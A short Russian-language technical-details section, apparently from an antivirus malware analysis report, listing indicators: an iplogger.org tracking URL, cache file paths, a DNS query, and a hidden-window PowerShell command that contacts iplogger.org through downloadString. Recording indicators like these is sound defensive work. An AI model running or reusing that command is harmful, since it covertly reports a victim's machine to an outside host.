Техническая информация
- https://iplogger.org/1w4y27
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- nul
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK ip###ger.org
- '%WINDIR%\syswow64\cmd.exe' cmd.exe /c start /B powershell -windowstyle hidden -command "&{(new-object net.webclient).downloadString('https://iplogger.org/1W4Y27')}"<Полный путь к файлу> >> NUL' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' cmd.exe /c start /B powershell -windowstyle hidden -command "&{(new-object net.webclient).downloadString('https://iplogger.org/1W4Y27')}"<Полный путь к файлу> >> NUL